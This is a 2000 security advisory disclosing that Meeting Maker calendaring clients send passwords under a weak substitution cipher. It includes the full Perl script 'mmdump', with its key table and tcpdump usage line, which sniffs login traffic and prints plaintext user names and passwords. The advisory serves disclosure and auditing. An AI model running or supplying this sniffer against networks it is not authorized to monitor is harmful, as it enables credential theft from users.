finding Meeting Maker passwords using tcpdump

2000-04-26T00:00:00
ID SECURITYVULNS:DOC:127
Type securityvulns
Reporter Securityvulns
Modified 2000-04-26T00:00:00

Description

Meeting Maker is a networked calendaring/scheduling software package that's estimated to be installed on over 700,000 desktops (e.g., see http://www.meetingmaker6.com/presslib/pressrel/mm061499mm6.htm). (Meeting Maker is a registered trademark of ON Technology Corporation.)

Clients send passwords to a Meeting Maker server encoded using a polyalphabetic substitution cipher. For an outline of the risks, as well as suggestions about how to reduce vulnerability and notes about future Meeting Maker security changes, go to the Tech Note index page at http://support.on.com/support/mmxp.nsf/Public/Chronological and select the security item dated 04/19/2000.

I was able to determine the password encoding by intercepting client-to-server traffic. Meeting Maker site administrators may need to check on what passwords are being sent because of requirements for

-- Auditing. You may have a policy that a user must not choose a Meeting Maker password that's the same as any of their other passwords, and need to verify policy adherence. -- Network planning. You may need to assess whether password-stealing threats justify the costs of making the communication channel between your Meeting Maker clients and server encrypted (or otherwise less vulnerable to eavesdropping).

I've included a script that can be used in conjunction with tcpdump to monitor one's network for Meeting Maker logins. For each login exchange that the script detects, the script provides the IP address of the Meeting Maker server, the server name (this won't necessarily match the server's DNS hostname), and the client user's name and password. The script does not understand the client-server protocol, and may well miss some (or, potentially in some environments, all) valid login exchanges. The network-traffic details that were used in developing the script were based on client hosts running Meeting Maker Java Client 6.04 and a Meeting Maker server running on Windows NT 4.0.

Matt Power mhpower@mit.edu

!/usr/bin/perl

mmdump -- filters tcpdump output to find Meeting Maker passwords

Author: Matt Power, mhpower@mit.edu

24 April 2000

usage: tcpdump -lnx -s 300 'tcp dst port 417' | mmdump

(Note: Meeting Maker is a registered trademark of ON Technology

Corporation)

@x = (20, 8, 9, 19, 9, 19, 1, 19, 20, 21, 16, 9, 4, 23, 1, 19, 20, 5, 15, 6, 20, 9, 13, 5, 1, 14, 4, 19, 16, 1, 3, 5); $in = ""; $ipl = <>; @ipf = split(/ /, $ipl); @ic = split(/\./, $ipf[3]); $ip = $ic[0] . "." . $ic[1] . "." . $ic[2] . "." . $ic[3]; while (<>) { if (/^\s/) { $in .= $; } else { $ipl = $; @ipf = split(/ /, $ipl); @ic = split(/\./, $ipf[3]); $newip = $ic[0] . "." . $ic[1] . "." . $ic[2] . "." . $ic[3]; $in =~ s/\s//g; $in =~ s/(..)/$1 /g; if ($in =~ /.7f ff ff .?00 00 00 .?00 00 00 (.)/) { if ($1 !~ /^[0 ]+$/) { ($s = $1) =~ s/ //g; $s1 = hex(substr($s, 0, 2)); $s = substr($s, 2, length($s) - 2); $s0 = hex(substr($s, 0, 2)); $s3 = 2 * ($s0 + 3); $s = substr($s, 2, length($s) - 2); if ($s1 == $s0 + 1 and length($s) >= $s3) { $f = substr($s, 0, $s0 * 2); $p = sprintf "H%d", 2 * $s0; $fn = pack $p, $f; $out = "Server Address: " . $ip . "\n"; $out .= "Server Name: " . $fn . "\n"; $s = substr($s, $s3, length($s) - $s3); $s1 = hex(substr($s, 0, 2)); $s = substr($s, 2, length($s) - 2); $s0 = hex(substr($s, 0, 2)); $s3 = 2 * ($s0 + 3); $s = substr($s, 2, length($s) - 2); if ($s1 == $s0 + 1 and length($s) >= $s3) { $f = substr($s, 0, $s0 * 2); $p = sprintf "H%d", 2 * $s0; $fn = pack $p, $f; $out .= "User Name: " . $fn . "\nPassword: "; $s = substr($s, $s3, length($s) - $s3); $s1 = hex(substr($s, 0, 2)); $s = substr($s, 2, length($s) - 2); $s0 = hex(substr($s, 0, 2)); $s = substr($s, 2, length($s) - 2); if ($s1 == $s0 + 1 and length($s) == 2 * $s0) { for ($j = 0; $j < 2 * $s0; $j += 2) { $nr = hex(substr($s, $j, 2)); $i = $j / 2; if ($nr >= 96) { $nr -= 96; if ($i) { $out = ""; last; } $out .= chr(($nr ^ $x[$i]) + 32); } elsif ($nr >= 64) { $nr -= 64; if (! $i) { $out = ""; last; } $out .= chr(($nr ^ $x[$i]) + 32); } elsif ($nr >= 32) { $nr -= 32; $out .= chr(($nr ^ $x[$i]) + ($i ? 64 : 96)); } else { $out .= chr(($nr ^ $x[$i]) + ($i ? 96 : 64)); } } if ($out ne "") { print $out . "\n\n"; } } } } } } $in = ""; $ip = $newip; } }